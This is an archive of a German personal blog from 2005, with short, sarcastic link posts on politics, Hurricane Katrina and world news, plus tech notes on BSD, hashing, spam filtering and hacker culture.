[l] Wie peinlich, daß es der Linkspartei braucht, um diese kleine Anfrage im Bundestag zu stellen. In mindestens 437 Fällen haben CIA-Folterflüge deutsche Flughäfen oder den Luftraum benutzt. Und was mich ja daran am meisten schockiert: daß die das nicht mal für nötig hielten, ihr Tun irgendwie zu verschleiern! Der Großteil der Flüge waren die selben zwei Flugzeuge! Und was machen sie jetzt, unsere Helden der "Volks"parteien? Auf Zeit spielen. Denn es steht der Worst Case im Raum, daß sich unsere Regierung für Nichteinschreiten mitschuldig gemacht hat, denn Beschwerden liegen schon länger vor, und sind sogar informell von den Amis bestätigt worden (für wie unantastbar müssen sich die Zuständigen eigentlich halten, um sowas auch noch zuzugeben?)

Fri Dec 2 2005

[l] Das höchste Gebäude der Welt hat offenbar einen Fault Line geöffnet und die ganze Region jetzt erdbebengefährdet gemacht

Sat Nov 26 2005

[l] Um ihre ethnischen Zerwürfnisse zu überwinden, hat die Stadt Mostar mit Hilfe der deutschen und chinesischen Botschafter gemacht, was jeder an ihrer Stelle gemacht hätte: sie haben eine Bruce Lee Statue aufgestellt. Und zwar wenige Tage bevor die "richtige" Statue in Hong Kong aufgestellt wird.
"We will always be Muslims, Serbs or Croats," said Veselin Gatalo of the youth group Urban Movement Mostar.
"But one thing we all have in common is Bruce Lee."
Mir fehlen die Worte.

Wed Nov 23 2005

[l] Chavez hat sein Wort wahr gemacht: Venezuelanisches Öl wird unter Wert an arme Amis verkauft. Nur, was soll da jetzt passieren? Vermutlich gibt das jetzt eine Dumping-Klage vor der WTO oder so.

Tue Nov 22 2005

[l] Only in Australia: "They were under the influence of various substances during the escapade". Das kann man wohl sagen. Zwei besoffene Männer, 20 und 22, machen eine Kleinstadt kaputt. "The pair are accused of collapsing and torching buildings". Ihre Verteidigung: The pair allegedly told the police they committed the crimes because they were "bored and stupid". Was mich ja wundert: in der Einleitung steht, sie hätten mehrere tausend Dollar Schaden angerichtet. Äh, mehrere tausend? Das muss ein Slum gewesen sein oder so. Das erklärt vielleicht auch, wieso die Polizei nicht reagiert hat, nachdem sie ein Clubhaus demoliert und einen Bus umgekippt haben, denn der Bericht sagt, sie hätten dann am nächsten Tag weiter gemacht.
[l] Merkel fügt beim Amtseid "so wahr mir Gott helfe" hinzu. *Grusel* Jetzt auch hier, die Fundi-Christen-Mullahkratie! (Jens weist darauf hin, daß das auch alle vorigen Bundeskanzler außer Schröder gemacht haben)

Thu Nov 17 2005

[l] FDP-Politiker schönt seinen Wikipediaartikel. Das ist natürlich eine echte Gefahr von Wikipedia. Die Leute könnten glauben, für eine gute Biographie muss man nicht mehr arbeiten und seinen Prinzipien treu bleiben, sondern man editiert sich einfach tadelloses Verhalten bei Wikipedia herbei. Update: Mathias Schindler weist darauf hin, daß Niebel das nicht selbst gemacht hat, sondern hat machen lassen.
[l] Schöne Beschreibung, wie das mit dem Patriot Act in der Realität funktioniert, und zwar am Beispiel eines Journalisten, der Fotos von einer Militärbasis gemacht hat.

Wed Nov 9 2005

[l] Bush hat mehr Schulden gemacht als die 42 Präsidenten vor ihm zusammen.
[l] Gewinnen lernen heißt von Gewinnern lernen: Bush hat von der Stasi gelernt und ließ 10000 Dossiers über "politische Gegner" anlegen. Glaubt ihr nicht? Habt ihr Recht. Bush ist zu dämlich für sowas, Karl Rove hat's für ihn gemacht.

Tue Nov 8 2005

[l] Frankreich verhängt Ausnahmezustand. Habe mich schon gefragt, wieso sie so lange damit warten. Die Amis hätten das schon am ersten Abend gemacht und die Nationalgarde eingeflogen.

Mon Nov 7 2005

[l] Ich dementiere Susannes ehrenrührige Falschdarstellung, daß ich keine Kommentarfunktion habe, weil ich nicht kritikfähig sei aufs schärfste. Gut daß ich auch nicht nachtragend bin. Ich halte fest: ich bin VOLL kritikfähig (solange es positive Kritik ist, die von Freunden kommt, natürlich nur; ich laß mich doch nicht von dahergelaufenen Proleten anfurzen hier!1!!). Ich habe deshalb keine ~~Kritik-~~ Kommentarfunktion in meinem Blog, weil ich keinen Bock darauf habe, die Kommentare alle moderieren zu müssen, weil ich mich sonst für irgendwelche Stalker angreifbar machen würde. Kommentarspam, diese "geben Sie mal folgende verzerrten Buchstaben ein" Dinger, das ist doch alles voll für die Tonne. Wer was kommentieren will, kann mir eine Mail schreiben. Ist genau so wahrscheinlich, daß das hier veröffentlicht wird, wie bei einem von mir zu moderierenden Kommentarsystem. Mußte mal gesagt werden. Ach ja, und ich habe auch keine Lust darauf, daß das hier zu einer Trollgrube ala Heise-Foren ausartet, und ich jemanden einstellen muss, der die Postings zensiert, die juristischen Drohbriefe sortiert und bearbeitet und Accounts deaktiviert, die Scheiße gemacht haben. Ich tippe lieber langatmige Fasel-Blogeinträge wie diesen hier in der Zeit.

Sun Nov 6 2005

[l] Unclear of the concept: Syrien verlangt unabhängige Prüfung des Uno-Berichtes zu Hariri. Liebe Regierung Syriens, die UNO ist unabhängig. Daher wurde diese Untersuchung von der UNO gemacht und nicht von, sagen wir, den USA. Das war ja wohl voll der Griff ins Klo.
[l] Ich hab jetzt auch mal FreeBSD zu installieren versucht, allerdings rebootet der frisch geladene Kernel sofort nach dem Laden. Vermutlich (hoffentlich!) mache ich da noch was falsch mit dem PXE-Kram. Damit wenigstens eine gute Sache aus diesem Desaster rauskommt, habe ich mal dokumentiert, wie man reproduziert, was ich hier gemacht habe, vielleicht hilft es ja jemandem. Ich guck morgen nochmal, ob ich das debugged kriege. Unter dem Strich war das jedenfalls ein Totalversagen aller Beteiligter. Am wenigsten versagt hat unter diesen Umständen bisher OpenBSD, so tragisch das ist, wenn man sich das Erreichte anschaut. Immerhin, man muss FreeBSD anrechnen, daß sie pxeboot auf die CD packen inzwischen. Ich sehe mich ja morgen schon von CD installieren, weil das anders alles gar nicht geht.

Thu Nov 3 2005

[l] Brownie war kein herzloser Bastard! In jetzt veröffentlichten Emails kann man sehen, daß er sich Sorgen um sein Image und seinen Hund gemacht hat.

Fri Oct 28 2005

[l] Ich hatte gestern hier von PA Semi geschwärmt. Die haben eine Webseite, wo sie von ihrem Schlüsselpersonal Bilder haben. Wer also schon immer mal wissen wollte, wie die Leute aussehen, die die ganzen aktuellen CPU-Designs gemacht haben: hier sind die Bilder. Geek Galore! :-) Und mal ehrlich, man muss eine Firma lieben, die Fotos ihrer Jubiläumstorten ins Web stellt

Thu Oct 27 2005

[l] Musiktipp: Johnny Cash - American IV: The Man Comes Around. Track 5: "I Hung My Head". Whoa! Wer auf sowas steht, dem kann ich auch das 70ies-Œuvre von Kris Kristofferson empfehlen, der hat eine ähnlich eindrucksvolle Stimme. Und wer Johnny Cash mag, dem empfehle ich noch das VH1 Storytellers Special, das er zusammen mit Willie Nelson gemacht hat.

Fri Oct 21 2005

[l] FX spricht ein großes Wort gelassen aus: die Hacker sterben aus. Ich bin ja an sich eher einer der Code Schreiben Szene, er eher einer der Code Anderer Leute Kaputt Machen Szene, aber die Probleme, die er in seiner Szene beschreibt, sehe ich auch in meiner Szene, wenn auch nicht ganz so kraß wie bei ihm.
Ich beobachte aber auch, wie immer weniger Leute bereit sind, überhaupt hinreichend Energie in etwas zu investieren, um sich damit jemals in die Nähe einer Perspektive zu bringen, Hacker zu werden. Natürlich kann nicht jeder überall der Oberheld sein, aber ich erwarte schon von jedem, daß er genug Ausdauer hat, sich in zumindest ein Thema mal tiefschürfend genug einzuarbeiten, daß ihm dort keiner mehr etwas vormachen kann. Und das kann ich immer weniger beobachten. Die Leute tendieren heute eher zu einer Art Universal-Durchschnitt. Die Abstände zwischen tollen neuen Hype-Trends werden immer kleiner, keiner hat mehr Zeit und Lust, sich die Sachen genauer anzugucken. Als ich jung war (*hust*), kamen PCs noch mit Handbüchern, in denen alle Befehle von GWBASIC beschrieben wurde, genau so wie debug.com und link.exe. Später wurden diese Sachen nicht mal mehr mitgeliefert. Ich war jung und hatte Zeit und habe mir das dann eben in Ruhe angeguckt. Ich enthülle hiermit: man wird Hacker, indem man Zeit hat und sie aufwendet, um sich mit einem Thema gut genug auszukennen, daß man mehr weiß als die Autoren der Standard-Fachliteratur zum Thema. Je nach eigenem Anspruch kann man sich auch nur dann Hacker nennen, wenn man sich in einem Gebiet erschöpfend auskennt, zu dem es (noch) gar keine Literatur gibt… :-)
Und dabei waren die Voraussetzungen noch nie so gut wie heute zum Hacker-Werden! Es gibt heute freie Betriebssysteme mit Editor, Compiler, Assembler und Linker kostenlos im Internet — mit Quellcode! Es kostet nichts mehr (außer Zeit), sich in die Sachen richtig gut einzuarbeiten! Man muss nicht mal Bücher kaufen, und heutzutage gibt es Suchmaschinen. Ihr wißt ja gar nicht, was das für ein Luxus ist, Kinder!
Zurück zum Thema. Heute kann jeder Hacker werden, der nur genug Zeit investiert. Als Hacker gewinnt man enorm an Selbstsicherheit, man ist gefragt auf dem Arbeitsmarkt, alles ist prima, aber aus irgendeinem Grund werden die Leute heute nicht mehr Hacker. Stattdessen hat die Verfügbarkeit freier Software zu einer Anspruchshaltung geführt, daß die Leute finden, wenn man schon nichts für Download und Installation zahlen muss, dann muss man auch danach keinen Aufwand investieren müssen. Den Nachwuchs in meinem Bekanntenkreis wird eher so High-Level-Fummler, klickt sich GUI-Anwendungen in einer IDE zusammen, hackt ein Python-Skript zum Mail-Sortieren, hat ein bißchen Java aus der Uni mitgenommen, steigt gerade auf C# um, sowas. Womit ich das nicht abwerten will, aber Hacken ist was anderes.
Es ist besser, in einer Sprache richtig gut als in 20 Sprachen Anfänger zu sein. Denkt da ruhig mal aus Sicht eines HR-Menschen drüber nach. Stellt euch vor, ihr seit der Headhunter, und ihr wäret mit einem Lebenslauf konfrontiert, bei dem jemand ein paar Applets (das klingt schon von alleine mittelmäßig und irgendwie abwertend) in Java gemacht hat, der gerade Windows Forms in Visual C# zusammenklicken lernt, der ein paar dynamische Webseiten mit PHP gemacht hat. Für was für einen Job soll so jemand denn bitte qualifiziert sein? Zum ct Lesen? Anspruchsvolle Jobs kann man so jemandem doch gar nicht geben! Wer sich nur oberflächlich mit Sachen beschäftigt, der wird auch nur oberflächliche Jobs bekommen. Was für eine grauenvolle Vorstellung… Insofern: setzt euch hin, sucht euch etwas aus, das ihr am besten noch nicht kennt, und arbeitet euch richtig tief ein. Nehmt euch dafür ein paar Monate. Hört erst auf, wenn ihr das Gefühl habt, selbst der Erfinder der Sache könnte euch nichts wirklich überraschendes mehr dazu erzählen. Solche Leute braucht das Land, nicht noch mehr Visual Basic Pfuscher.

Thu Oct 20 2005

[l] Ich habe gerade so einen Hype-Nervmoment. Mann geht mir dieses ständige Rumgehype in der Computerbranche auf den Geist. Und dabei ist es so transparent! Alle, die einem irgendeinen neuen Hype-Scheiß andienen wollen, haben dabei Hintergedanken. Unis möchten gerne hip und innovativ da stehen. Journalisten möchten gerne Trends aufzeigen. O'Reilly möchte gerne erst einen Trend herbei hypen, und dann viele Bücher zum Thema verkaufen. Und am Ende setzen sich Tausende von Geeks mit überflüssigem Scheiß auseinander, mit neuen Worten für alte Ideen, verplempern ihre Lebenszeit mit Buzzword-Technologien, immer getrieben von der Angst, sie könnten irgendwann mal unvorbereitet erwischt werden, bei einem Job, der $FOO braucht, und sie kennen aber nur $BAR.
In meinen Augen sind die meisten aktuellen Trends völlig überflüssig. Ich programmiere weder in Java, noch in C#, noch in Dylan. Ich spreche kein Python, kein PHP, kein Ruby, schon gar nicht Ruby On Rails. Ich benutze keine Middleware, keine Frameworks, keine Design Patterns (also ja, natürlich benutze ich Design Patterns, jeder benutzt Design Patterns. Aber ich benutze sie einfach so, nicht weil ich das in einem Buch gelesen habe). Gemessen am Stand der Technik bin ich auch in C++ und Perl eher Fußgänger als Rennfahrer. Ich benutze kein XML, kein CORBA, kein XML-RPC, kein SOAP. Wenn ich mal ein GUI für eine Anwendung brauche, wird es halt eine Webanwendung. Und zwar HTML, kein Javascript, und schon gar kein AJAX. Qt, Gtk, Motif? Am Ende gar noch mit KDE oder GNOME drüber gelayert? In der Zeit, bis ich mich da ordentlich eingearbeitet habe, schreibe ich lieber einen LDAP-Server. Wieso ordentlich einarbeiten und nicht einfach loshacken, höre ich da? Eine Sache, die es nicht wert ist, ordentlich gemacht zu werden, ist es nicht wert, überhaupt gemacht zu werden.
Und das sage ich euch: der nächste, der mich mit AJAX belästigt, wird einen furchtbaren, grausam verstümmelnden Unfall haben.

Wed Oct 12 2005

[l] Rückblickend war es keine gute Idee der Magazine Publishers of America, Jon Stewart einzuladen und ihm $150k für sein Erscheinen zu zahlen. Er hat sich da offenbar die ganze Zeit nur über die Leute um ihn rum lustig gemacht.

Sun Oct 9 2005

[l] Warum soll man die Wähler eigentlich bloß indirekt über Steuern zur Kasse bitten? Das haben sich offenbar einige CDU- und FDP-Politiker gedacht, und einen "Promifonds" gegründet und dafür kräftig Werbung gemacht. Die Anleger sehen ihr Geld wohl nicht mehr wieder. Tja, an sich eine Frechheit, aber irgendwie kann ich denen nicht böse sein. CDU und FDP haben doch schon im Bundestag bewiesen, daß sie nicht mit Geld umgehen können. Wer denen noch sein Privatvermögen in die Hand drückt, hat es nicht anders verdient.

Sat Oct 8 2005

[l] Su-Shee hat in ihrem Blog diesen Artikel hier verlinkt: Die Zeit über Suchmaschinen. Ich nehme das mal zum Anlaß, eine kleine Geschichte zu erzählen.
Ich war mal zu einem Vorstellungsgespräch bei Google (ist nichts geworden, weil ich nach Zürich wollte, aber die mich in Mountain View haben wollten, und wer will schon in den USA leben), und u.a. ging es darum, wie man eine Suchmaschine baut. Weil ich das ja auch schon mal gemacht habe, haben wir uns über Details unterhalten, wie z.B. wie man das Ranking der Ergebnisse macht, oder wie man Schlüsselwörter extrahiert.
Ich hatte mir damals einen total trivialen Ad-Hoc Hack ausgedacht: zähle die Worthäufigkeiten in dem Artikel. Teile die Häufigkeiten jeweils durch die Anzahl der Wörter in dem Artikel. Habe eine Datenbank, wo für alle Wörter dieser Quotient über den gesamten Korpus als Durchschnitt steht. Die Schlüsselwörter des Artikels sind die Wörter, bei denen der Quotient größer als der Durchschnitt sind. Z.B. die fünf mit dem höchsten Quotienten.
Fand ich damals total offensichtlich, hatte keinerlei Literatur zum Thema gelesen (so gehe ich übrigens auch heute an die meisten Sachen heran; wenn man sich vorher durchliest, wie andere das machen, entgeht einem der Großteil der Erkenntnis, und man hat am Ende nicht verstanden, wieso das funktioniert, was man da gerade getan hat), und es funktionierte. Es gibt da noch so Details wie daß mit diesem Verfahren Typos ein hohes Rating kriegen. Und man kann das Verfahren noch tunen, indem man z.B. großgeschriebene Wörter höher bewertet, oder indem man Wörter höher bewertet, die näher am Anfang des Artikels sind. Und es ist auch sinnvoll, sehr kurze Artikel nicht zu werten. Diese ganzen Tweaks hab ich damals bei Google aber gar nicht erwähnt, obwohl sie am Ende das sind, was die Qualität des Verfahrens ausmacht.
Wieso ich das alles erzähle: der Google-Mensch meinte darauf zu mir sinngemäß: "ja, genau so machen das auch alle anderen." Und er nannte dann noch den Namen, den dieses Verfahren in der Literatur hat.
Ich stand da wie vom Blitz getroffen. Aha, mein kleines Ad-Hoc Verfahren ist also das, was auch alle anderen nehmen? Und so einen Moment, meine lieben Leser, gönne ich euch auch von ganzem Herzen. Die anderen kochen auch alle nur mit Wasser. Gebt euch selbst eine Chance, mal etwas großes zu erfinden, und wenn ihr das nächste Mal ein Problem habt, guckt nicht gleich in die Lösung, äh, Literatur, sondern denkt erst mal selbst eine Runde nach. Kreativität muss man eben auch pflegen, immer schön gießen, in die Sonne stellen. Gelegentlich düngen mit einem Blick in die Literatur ist bei allen außer den größten Genies natürlich auch notwendig, aber traut euch doch auch mal, Sachen einfach selber zu erfinden. Wer weiß, vielleicht kommt dabei etwas großartiges raus?
BTW: Es gibt da eine Urban Legend von einem Studenten, der nie zur Vorlesung gegangen ist, sich immer nur die Übungszettel abgeholt hat, und die dann gelöst hat. Eines Tages war eine unlösbare Aufgabe darunter, was der Prof zwar dazu sagte, aber nicht dran schrieb, und unser Student löste das. Ich habe mal einen solchen Studenten kennen gelernt. Der hat eine Aufgabe im Datenbankpraktikum dann über schlecht dokumentierte Extensionen in der für die Übung eingesetzten Datenbanksoftware gelöst. Der Tutor hat die Lösung nicht verstanden und keine Punkte gegeben.

Thu Sep 29 2005

[l] Beim Durchgehen der Maillogs habe ich bei Hotmail die Beobachtung gemacht, daß von den IPs 65.54.17[23].* nur Spam kommt, die eine legitime Mail kam von 65.54.171.*, von 65.54.16[34].* kam auch nur Spam, ebenso von 65.54.248.*. Die "wir würden doch nie Spammen!1!!" Mails der Abuse-Abteilung von Hotmail kommt komplett von 65.54.241.240. Man kann da also offenbar selektiv den Spam nach IP-Range wegfiltern :-)
Da ich eh niemanden kenne, der Hotmail als Email-Service nutzt, würde es mich auch nicht traurig machen, Hotmail komplett zu filtern. Nur haben die leider keinen eigenen IP-Range sondern sind Teil des MS IP-Ranges.

Mon Sep 26 2005

[l] Die Friedenstruppen der NATO kriegen einen Großflughafen in Leipzig. Von da aus können sie ihren humanitären Kinder-und-arme-Menschen-Zerbomben-Missionen besser folgen. Das schöne an dem Bericht: es wird mal beschrieben, wie es zu sowas kommt. Man könnte ja denken, sowas wird mit Arbeitsplätzen für die Region begründet, aber das haben sie nicht mal gemacht! Stattdessen haben sie dem Bürgermeister was von DHL-Ansiedelung vorgelogen, und als die Kohle dann bewilligt war, haben sie unwichtige Detail mit dem Militär nachgeschoben. Und weil wir Deutschen zu unserem Wort stehen, platzt so ein Deal dann nicht, sondern wird durchgezogen. :-(
[l] Only in Österreich: "Beide Rechenzentren werden von Telekom Austria am selben Standort (Arsenal Wien) betrieben." Aber ich bin unfair den armen Österreichern gegenüber. Das geht bestimmt im Rahmen der Amtshilfe auf T-Systems zurück, die sind schließlich für ihre überragende Projektkompetenz bekannt, ich verweise da nur auf den internationalen Großerfolg "Tollcollect". Ich habe mir sagen lassen, daß auch an dem österreichischen Gesundheitskartesystem Fraunhofer mitgemacht hat. Ob das strukturell das gewohnte Fraunhofer-Niveau halten kann? Wenn die Österreicher sich da schon von Deutschen reinreden lassen, hätten sie dann nicht jemanden fragen können, der sich mit sowas auskennt?

Wed Sep 21 2005

[l] Die Schlagzeilen werden heutzutage echt von anderen Leuten gemacht als die Artikel: Ja wohin geht es denn jetzt, nach Galveston oder nach New Orleans? Auf der Karte hier sieht man, wie weit die entfernt sind

Tue Sep 20 2005

[l] Gefängnisausbruch mal anders: Britische Truppen haben gestern in Basra mit Panzern die Wände eines Gefängnisses eingerissen, um Undercover-Agenten daraus zu befreien. Einige Dutzend Irakische Insassen haben sich bei der Gelegenheit natürlich auch aus dem Staub gemacht, andere Quellen sprechen von 150. Hier ist ein bißchen Hintergrund. Die Briten hatten vorher die Polizeistation umzingelt, wo die Männer festgehalten wurden. Das ist ja echt Wild-West da gerade. Daraufhin haben wütende Demonstranten wiederum die Briten umzingelt, woraufhin die abzogen. Ich finde auch spannend, daß die Briten den Irakern gegenüber angegeben haben, die Männer seien auf einer Geheimdienstaktion gewesen.

Wed Sep 14 2005

[l] Only in America: Polizei soll bei Untersuchung von gutaussehender Lehrerin, die Sex mit Schülern gehabt haben soll, inappropriate pictures of her sexual organs gemacht haben

Tue Sep 13 2005

[l] Hier eine Meldung, mit der ich so nicht gerechnet habe: Die Grünen im Bayerischen Landtag werfen Beckstein innenpolitisches Versagen vor, weil seine Polizei mit ein paar hundert randalierenden Hooligans auf dem Weg nach Sachsen nicht klargekommen sind. Auf der Heimfahrt vom Zweitligaspiel 1860 München gegen Dynamo Dresden in der Münchner Allianz-Arena hatten am Freitagabend etwa 40 Busse und mehrere Autos mit insgesamt etwa 3000 Schlachtenbummlern an der Raststätte an der A 93 Halt gemacht. Mehrere Fans zerschlugen in der Gaststätte Lampen über den Theken, stahlen Nahrungsmittel und alkoholische Getränke und zündeten Feuerwerkskörper in der Nähe der Tankanlage. Na solange die Polizei von Schönbohm nicht funktioniert…
[l] Habe heute mal wieder ein bißchen mit Hashing zu tun gehabt, und habe daher mal rumgegooglet und die lookup2 Hash-Funktion genommen, die im DDJ vorgestellt wurde, und wo sich jemand richtig Gedanken gemacht hat und da eine involvierte Monsterfunktion gehackt hat. Gegen die Funktion habe ich dann die Hashfunktion antreten lassen, die djb in cdb einsetzt. Nicht nur war die djb-Funktion schneller, sie hatte auch weniger Kollisionen. Die djb-Hashfunktion ist übrigens: h=(h+(h<<5))^buf[i]. Und so kehre ich am Ende doch wieder reumütig zu djb zurück, wie immer. :-) Ein interessantes Meßergebnis gab es allerdings noch: die Kollisionsketten werden nicht länger, wenn man statt einer Primzahl einfach eine Zweierpotenz nimmt. Kann aber natürlich auch an den Daten liegen gerade.

Sat Sep 10 2005

[l] Aus Geldmangel werden im Irak gerade viele Projekte gestoppt. Soweit, sogut. Es werden nur noch Projekte gemacht, die die Irakische Regierung für essenziell hält. So hat ein Subunternehmer die Arbeiten an 6 von 8 Trinkwasser-Filteranlagen eingestellt. Äh, Trinkwasser ist nicht essenziell?! Was zur Hölle ist denn essenziell wenn nicht Trinkwasser in einem Wüstenland?!

Fri Sep 9 2005

[l] Der FEMA-Chef wurde suspendiert. Na klar, der war jetzt an allem Schuld, und Bush versucht sich aus der Verantwortung zu stehlen. Update: Dieser Eintrag erhält das Prädikat: Story des Tages. Die ist mir gerade vom 5. gemailt worden :-)
[l] Zu den Benchmarks nochmal. kju meckert in seinem Blog, das sei unseriös, wenn ich hier nach Benchmarks frage, die BSD gut und Linux schlecht aussehen lassen, denn Benchmarks sollen ergebnisoffen durchgeführt werden. Stimmt.
Ich finde es allerdings eine interessante Metrik, a) wie viele Szenarien sich die OS-Fans selbst ausdenken können, in denen ihr Favorit klar führt, und b) wie realitätsnah die sind. Letztes Mal ging es mir nur darum, interessante Messungen durchzuführen. Nachdem dann zwei der drei Beteiligten als Antwort auf die Benchmarks deutliche Verbesserungen vorgenommen haben, die allen etwas gebracht haben, habe ich das dieses Mal auch zu meinem Anspruch gemacht, Sachen zu finden, die besonders verbesserungswürdig sind, und auf die mal jemand pressewirksam mit dem Finger zeigen sollte.
Bisher ist übrigens noch kein Benchmarkvorschlag bei mir eingegangen. Auf der einen Seite schön, weil die Leute vielleicht keine Benchmarks manipulieren wollen, auf der anderen Seite kann es ja auch an Verpeilung oder Desinteresse liegen, oder daran, daß es tatsächlich keine Szenarien gibt, in denen BSD Linux outperformt.
Manche Leute haben vermutet, es ginge darum, den Vorwurf des Linux-Bashings zu vermeiden. Darum geht es nicht. Es geht mir voll am Arsch vorbei, wenn BSDler keine andere Verteidigung finden, als den Benchmark-Durchführer persönlich anzugreifen, im Gegenteil, das ist in sich ein prima Meßwert über das jeweilige BSD. Weil das so ist, habe ich letztes Mal NetBSD so gelobt, die es nicht gemacht hatten.
Aber es läßt sich ganz deutlich sagen, daß meine Benchmarks letztes Mal gezeigt haben, daß Linux 2.6 schon weitgehend perfekt ist von der Skalierbarkeit, und so hat Linux 2.6 keine vorteilhaften Veränderungen gemacht, als einziger Teilnehmer keinen Gewinn gezogen. Dieses Mal möchte ich, daß auch für Linux etwas heraus fällt. Ganz einfach.

Thu Sep 8 2005

[l] Oh Mann. Bush war doch während Katrina in San Diego, um sich mit alten Leuten fotographieren zu lassen und über Krankenversicherungen zu reden. Man könnte ja hoffen, daß sich das wenigstens gelohnt hat für ihn. Aber nein: für den Bush-Besuch wurde das Krankenhaus komplett zu gemacht, und Patienten waren gezwungen, ihre Chemotherapie für Tage zu unterbrechen. Aber hey, was sind schon die Leben von ein paar Krebspatienten im Vergleich zu Bushs Wahlkampf!1!!

Wed Sep 7 2005

[l] Only in Australia: Bizarrer Krieg der Australier gegen die Aga-Kröte ("cane toad") mit dem Hintergrund der Sache. Ähnlich wie die Kaninchenplage ist auch die Aga-Kröten-Plage hausgemacht, die Tiere sind von Menschen absichtlich eingeführt worden. Die Aga-Kröten sollten einen Käfer fressen, der das Zuckerrohr angriff, aber dann merkte man, daß dieser Käfer den Kröten gar nicht schmeckt, und jetzt gibt es Millionen davon, und sie sind hochgiftig. Und jetzt bekämpft man sie, indem man sie mit Disco-Schwarzlich anlockt!
[l] Das US-Außenministerium informiert: Woran der aufrechte Journalist Misinformation erkennt! Da stehen so Perlen drin wie: "Does the story fit the pattern of a conspiracy theory?" Und dann faseln sie was vom sovietischen Propaganda-Apparat, der die armen unschuldigen Amis regelmäßig für Wetterphänomene verantwortlich gemacht hat…

Sat Sep 3 2005

[l] Ich muss ein bißchen ausholen, um die Tragweite dieses Clips von FOX NEWS zu beleuchten. Die haben Geraldo Riviera zu einem Reporter gemacht, wo er als völlig inkompetenter und patriotischster Hurra-Journalistenzerrbild u.a. im Irak war und da Lobeshymnen auf die Army gesungen hat. Der Mann war, kurz gesagt, der Anti-Journalist schlechthin. Vorher hat er eine super-schnulzige Talkshow gemacht, ganz furchtbar, nicht auszuhalten, so der lang vermißte Sohn findet den Vater wieder, alle heulen eine halbe Stunde herum, völlig unkontroverses unkritisches Zeug ohne Inhalt. So, und dieser Geraldo, den hat Fox News jetzt nach New Orleans geschickt, und er ist in den Superdome gegangen und von da live (!) berichtet. Und in diesem Bericht hat er völlig abgeklinkt, war voll aufgelöst, wie schlimm das alles ist, daß da gar nichts geht, und hat am Ende sogar in die Kamera zu heulen angefangen und ein hungerndes Baby hochgehalten! Für DEN staatstragenden Sender Fox News war das gerade, als wenn jemand den Stromstecker aus der Matrix rausgezogen hat, und die Leute alle aufwachen und komische Dinge sehen. Unfaßbar.
[l] Gerade beim Zappen CNN gesehen, wo Larry King den Chef vom Army Chorps of Engineers interviewt, und der hat da ernsthaft folgendes Statement abgegeben: Wir haben alles unter Kontrolle, und die Löcher in den Deichen, die haben wir deshalb nicht zugemacht, weil der Wasserstand gerade am Sinken ist, und irgendwo muss das Wasser ja wegfließen, also bleiben die Löcher erst mal.

Thu Sep 1 2005

[l] Aua! Katrina hat 8 Raffinerien kaputt gemacht, jetzt sind insgesamt 2 Millionen Barrel Öl pro Tag weniger da. Und dieser Artikel spricht davon, daß die Raffinerien für Monate offline sein könnten!. Das sind 11 Prozent der US-Raffinerien-Kapazität! Das ist das Ende.

Tue Aug 30 2005

[l] Wer gestern Öl-Futures gekauft hat, hat jetzt schon fett Gewinn gemacht. Und man kann ja echt nicht sagen, daß das nicht offensichtlich passieren würde.
[l] Katrina hat die Ölförderung im Golf von Mexiko kaputt gemacht. Noch ist unklar, was genau kaputt gegangen ist. Worst Case ist das Terminal da, das einzige der USA, an dem Supertanker andocken können.

Mon Aug 29 2005

[l] Im Hurricane-Einzugsgebiet bei New Orleans ist auch das größte US-Ölterminal, über das ein Drittel der Ölimporte umgeschlagen werden, und das wird jetzt evakuiert und möglicherweise vom Sturm plattgemacht.

Fri Aug 19 2005

[l] Hier ein paar Hintergründe zu Gate Gourmet. Die haben ursprünglich Swissair gehört, Texas Pacific hat die gekauft und mit hohen Schulden beladen. Das gleiche haben sie auch mit Grohe gemacht (Sanitärarmaturen). Kurz: Das haben Geier-Sturzflug-Turbospekulanten ohne jegliche Managementerfahrung gekauft und rammen das jetzt aus Inkompetenz unangespitzt in den Boden.

Thu Aug 18 2005

[l] Verbesserter Angriff gegen SHA-1 hat jetzt nur noch die Komplexität 2^63. Damit ist SHA-1 endgültig durch. Und die USA haben sich mal wieder vollständig lächerlich gemacht, indem sie dem chinesischen Team keine Visa erteilt hat, so daß die das nicht auf der Crypto 2005 vortragen konnten. Was für ein lächerlicher Versagerverein. (Danke, Mathias)

Tue Aug 16 2005

[l] Ich bin ja an sich kein Freund von Microsoft, aber wenn es eine Firma gibt, die es verdient hat, von Microsoft platt gemacht zu werden, dann ist es Apple. Microsoft hat die iPod-Patente 2 Monate vor Apple angemeldet und könnte jetzt 10 Dollar pro iPod Lizenzgebühren von Apple nehmen
[l] Wie viel Koks muss der Verantwortliche geschnupft haben, um Beckstein für den Wahlkampf ausgerechnet nach Berlin Kreuzberg zu schicken?! Erwartungsgemäß ist Beckstein aufs Gröbste ausgepfiffen worden, und nach seinem Essen in einem türkischen Restaurant (WTF?!) mußte er durch die Hintertür fliehen, nachdem ihm 100 Polizisten nicht hinreichend Schutzgefühl geben konnten. Oh Mann. Und fast noch der lustigste Aspekt: in der Rede, von der keiner was mitgekriegt hat, hat er mehr Anstrengungen zur Integration von Ausländern gefordert. Wer ist dieser Mann und was haben sie mit unserem Günter "Abschieben!1!!" Beckstein gemacht?!

Sun Aug 14 2005

[l] Während die Amis zu wenig Soldaten haben, sind es bei den Russen eher zu viele: Offizier der russischen Armee verhaftet, nachdem er untergebene Soldaten als Billigarbeiter an Unternehmen vermietet hat. Natürlich haben die Soldaten nur ihren normalen Sold gekriegt, der Mann hat die Zahlungen eingesackt. U.a. haben die Möbel gebaut und Würstchen gemacht.

Wed Aug 10 2005

[l] Der Format-Krieg zwischen HD-DVD und Blu-Ray hat sich gerade entschieden — beide haben verloren. Das Kopierschutzverfahren sieht vor, daß die Player per Internet erreichbar sind, und per Firmware-Update (das durch Abspiel-Security-Violations ausgelöst werden kann) kaputt gemacht werden können. Und das wollen jetzt beide so machen. Damit ist klar, daß der zukünftige HDTV-Content von Raubkopierern kommen wird, die es von ihrem Kabel- oder Sat-Provider gerippt und DRM-befreit haben. Wer gibt denn bitte Geld für sowas aus? Für wie blöd halten die eigentlich ihre Kunden? Ach ja, und seinen fetten HD-Fernseher kann man auch erst mal wegschmeißen, den supporten die nicht, weil er nicht ihr komisches Krypto-to-the-TV Verfahren unterstützt. Die haben ja alle ne Macke.

Tue Aug 9 2005

[l] Hier eine interessante Analyse der Japan-Reformen, u.a. mit einer Gegendarstellung zur Post-Privatisierung. Es ging dabei offenbar nicht darum, Staatseigentum zu verramschen, um Schulden zu senken, sondern um eine Entkopplung der Postsparkasse, über deren Fonds der Politfilz offenbar immer mal gerne gemauschelt haben.

Sat Jul 30 2005

